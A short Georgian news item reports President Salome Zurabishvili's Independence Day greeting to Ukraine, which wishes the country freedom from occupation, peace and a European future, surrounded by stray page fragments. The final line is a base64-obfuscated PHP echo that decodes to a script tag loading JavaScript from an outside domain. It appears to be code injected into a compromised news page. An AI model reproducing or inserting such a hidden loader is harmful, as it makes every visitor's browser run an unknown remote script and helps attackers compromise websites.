celsiusi
ავერსი შნაიდერი

ძვირფასო უკრაინელო მეგობრებო, მთელი გულით და ქართველი ხალხის სახელით გილოცავთ დამოუკიდებლობის დღეს! - მინდა გისურვოთ ქვეყნის ოკუპაციისგან გათავისუფლება, მშვიდობის აღდგენა, - ამის შესახებ საქართველოს პრეზიდენტი სალომე ზურაბიშვილი უკრაინის დამოუკიდებლობის დღისადმი მიძღვნილ მიმართვაში აღნიშნავს.

„ძვირფასო უკრაინელო მეგობრებო, მთელი გულით და ქართველი ხალხის სახელით მინდა მოგილოცოთ დამოუკიდებლობის დღე!

მინდა გისურვოთ თქვენი მიზნისაკენ წინსვლა, რაც ასევე ჩვენი საერთო მიზანია - თქვენი ქვეყნის ოკუპაციისგან გათავისუფლება, მშვიდობის აღდგენა, თქვენი ქვეყნის სრული სუვერენიტეტი და ტერიტორიული მთლიანობა. ესაა ჩემი სურვილი თქვენი ქვეყნისათვის, ესაა ჩემი სურვილი ჩემი ქვეყნისათვის და ესაა ჩემი სურვილი ორივე ქვეყნის ევროპული მომავლისათვის!“ - აღნიშნავს საქართველოს პრეზიდენტი.

 

95
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");